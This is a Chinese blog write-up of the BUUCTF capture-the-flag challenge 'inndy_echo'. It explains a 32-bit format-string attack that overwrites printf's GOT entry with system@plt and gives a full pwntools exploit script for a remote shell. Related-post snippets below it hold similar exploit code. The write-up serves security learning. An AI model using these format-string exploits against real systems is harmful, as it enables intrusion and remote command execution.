[BUUCTF]PWN——inndy_echo(32位fmt修改got表)

最新推荐文章于 2024-02-06 03:13:08 发布
最新推荐文章于 2024-02-06 03:13:08 发布
阅读量828 收藏 3
点赞数 1
分类专栏: BUUCTF刷题记录 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcmuyanga/article/details/113509240
版权

inndy_echo

附件

步骤

  1. 例行检查,32位程序,开启了nx保护
    在这里插入图片描述

  2. 本地试运行一下,看看大概的情况,已经看到存在格式化字符串漏洞了,而且还是可以一直输入的哪种
    在这里插入图片描述

  3. 32位ida载入
    在这里插入图片描述
    看到程序里存在格式化字符串漏洞,而且有system函数,想到的是将printf@got修改为system@plt,由于一开始system没用执行,所以got表里的地址不对,得用plt表里的。然后传入bin/sh即可

  4. pwntools集成了一个很强的工具,我们可以通过它快速修改对应的值,
    命令格式: fmtstr_payload(argue_place, {printf_got_addr: system_plt_addr})
    其中argue_place代表payload中前四个字符所在的参数位置(就是说%p$n中p的值,我们长叫它偏移量)

  5. 理清楚思路后先来确定一下偏移量,确定偏移为7
    在这里插入图片描述
    因此可以直接使用 fmtstr_payload(7,{print_got:system_plt})即可完成修改,之后传入参数‘/bin/sh’

完整exp

from pwn import *

r=remote('node3.buuoj.cn',27843)
elf=ELF('./echo')

printf_got=elf.got['printf']
system_plt=elf.plt['system']

payload=fmtstr_payload(7,{printf_got:system_plt})

r.sendline(payload)
r.sendline('/bin/sh')
r.interactive()
Angel~Yan
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
AVR系列单片机Mage8PWM脉冲输出程序
pwn 栈题基础
y0un9er
08-18 919
简要得介绍了一下栈题的思路
[BUUCTF-pwn] inndy_echo3
weixin_52640415的博客
12-07 251
格式化字符串漏洞,这个题整了一会感觉很烦,然后搜了LiuLian 大师傅的exp [Hackme.inndy]echo/echo2/echo3 | LiuLian 感觉还是自己干吧。 程序没开pie这给泄露减轻不少负担,但这个题在main里先用随机数申请内存,然后在hardfmt里给esp赋值,这导致每次运行栈地址并不完全固定。 不固定其实是相对的,在hardfmt里它是不固定的,但是再往前main和libc_start_main_ret这些都是固定的,只要找到ebp再往后就固定了。 int _..
[BUUCTF-pwn]——inndy_echo
Y_peak的博客
03-29 514
[BUUCTF-pwn]——inndy_echo 有gets函数但是没有办法栈溢出,不过幸好有格式化字符串漏洞。 从旁边我们可以找到system的plt以及printf的got, 将system的plt地址写入printf的got。然后输入"/bin/sh"就可以了。 先找找偏移 7 exploit from pwn import * p = remote("node3.buuoj.cn",28268) #p = process("./echo") #gdb.attach(p, "b printf
awd pwn——LIEF学习
CoLin的pwn小屋
04-04 2022
python LIEF库学习
inndy_echo
weixin_46521144的博客
04-01 348
这道题比较简单,一个fmtstr直接丢给你做,没有栈溢出,虽然也没有canary 那就不管了,直接GOThijack 注意到其实函数本身是调用了system函数的,因此可以在plt中直接找到system函数写入GOT中 然后之前没注意,还尝试着把libc基址泄露之后把system的地址直接写回EXIT的GOT中,尝试在发送EXIT之后调用。但是这样会导致不对齐的现象。。。 除此之外本题还学到一个新的内容。我本来以为fmtstr要写的内容必须是严格递增的 所以之前没有尝试去写print
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
PWN.zip_PWN控制舵机_pwn控制_pwn控制h桥_数字舵机_电机
07-14
pwm波输出,实现数字舵机的控制,完成一些简单的电机控制问题
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
【How2Pwn】DreamHack x86下的ROP问题
Jeongon的博客
09-13 305
x86下的ROP问题
[BUUCTF]PWN——inndy_echo2(PIE+64位fmt
mcmuyanga的博客
02-01 1484
inndy_echo2 附件 步骤 例行检查,64位程序,开启了nx和pie 本地试运行一下,看看大概的情况,猜测跟echo差不多。 64位ida载入,跟32位echo一样的代码,只是多开了一个PIE 64位的格式化字符串漏洞,它跟32位有挺大区别的,要注意‘00’的截断,不可以像32位那样一步修改到位,它一次只可修改2字节。不清楚的先看这篇文章 首先对于PIE,我们要先想办法泄露程序基址 在执行echo函数时,echo的栈帧的上一个元素存储了函数的返回地址,返回到main中,所以栈中必定有返回地址
[BUUCTF]PWN——axb_2019_fmt64(64位格式化字符串改got
mcmuyanga的博客
01-27 2488
axb_2019_fmt64 附件 步骤: 例行检查,64位程序,只开启了nx保护 本地运行看一下,可以一直输入 64位ida打开 跟axb_2019_fmt32差不多,所以还是再次利用格式化字符串漏洞通过%n来写入数据 利用过程 首先找一下偏移,偏移为8 找到偏移后我们就可以泄露libc,计算system和bin/sh了 一开始打算跟fmt32一样来泄露libcpayload = p64(puts_got)+"%08$s",失败了,动调发现被/x00截断了,64位都有这个情况,关于64位格式
BUUCTF(pwn)inndy_echo(32位格式化字符串修改got
半岛铁盒的博客
04-05 401
这道题为我们提供了 system, 和 循环 过程, 为我们简化了很多步骤 from pwn import* p=remote('node3.buuoj.cn',25331) elf=ELF('./echo') printf_got=elf.got['printf'] sys=0x8048400 payload=fmtstr_payload(7,{printf_got:sys}) p.sendline(payload) p.sendline('bin/sh') p.interactive() 对...
BUUCTF刷题6
m0_51251108的博客
11-03 417
题目:gyctf_2020_some_thing_exceting:mrctf2020_shellcode_revenge:axb_2019_brop64:inndy_echo:wustctf2020_name_your_cat:wdb2018_guess:oneshot_tjctf_2016:zctf2016_note2:ciscn_2019_final_2:wustctf2020_number_game: gyctf_2020_some_thing_exceting: 这题存在uaf漏洞 程序开始时读入
PWN-PRACTICE-BUUCTF-23
P1umH0的博客
09-09 592
PWN-PRACTICE-BUUCTF-23gyctf_2020_some_thing_excetingaxb_2019_heap[极客大挑战 2019]Not Badinndy_echo gyctf_2020_some_thing_exceting 程序读取了flag到bss段上的0x6020A8地址处 存在uaf漏洞,利用fastbins的LIFO原则,create大小合适的chunk并free 再次create,将0x6020A8覆写到之前create并free掉的chunk里,最后show即可打印出
[BUUCTF]-PWN:inndy_echo解析(32位格式化字符串漏洞)
最新发布
2301_79326813的博客
02-06 717
查看保护查看ida有格式化字符串漏洞,可以修改printf的got内地址为system,传参getshell。
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP详解主要讲解了如何利用RIP寄存器来进行PWN攻击。RIP寄存器是存储下一条指令的地址,通过控制RIP寄存器的值,可以改变程序的执行流程,从而实现攻击的目的。 PWN攻击是一种利用软件漏洞来获取对计算机系统的控制权的攻击方式。在PWN攻击中,攻击者通常会利用程序中的漏洞,通过输入特定的数据来改变程序的执行流程,从而实现攻击的目的。 BUUCTF PWN-RIP详解文章提供了一些示例和技巧,帮助读者理解和掌握PWN攻击中利用RIP寄存器的方法。如果你对PWN攻击感兴趣,可以阅读该文章以获取更多详细信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值